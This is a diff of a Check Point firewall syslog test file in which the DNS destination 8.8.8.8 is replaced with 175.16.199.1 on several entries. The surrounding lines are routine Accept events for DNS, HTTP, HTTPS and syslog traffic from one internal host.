-<134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60219"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60219"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51204"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10126"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58217"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:16:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbd1,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64692"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43415"; xlatesrc:"0.0.0.0"]
@@ -850,7 +850,7 @@
 <134>1 2020-03-29T15:56:02Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c512,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43258"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:56:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c513,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:56:04Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c514,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56481"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56481"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65390"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43437"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48552"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:56:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c517,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64356"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43438"; xlatesrc:"0.0.0.0"]
@@ -865,7 +865,7 @@
 <134>1 2020-03-29T15:58:57Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c5c1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:00:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c608,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47646"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:00:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:00:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58997"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:00:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58997"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58370"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10160"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53053"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65458"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43441"; xlatesrc:"0.0.0.0"]
@@ -873,7 +873,7 @@
 <134>1 2020-03-29T16:00:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c60e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51974"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10161"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:02:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c686,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53215"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:02:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c688,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61509"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61509"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58408"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10162"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54035"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:02:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c68b,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64460"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43442"; xlatesrc:"0.0.0.0"]
@@ -964,7 +964,7 @@
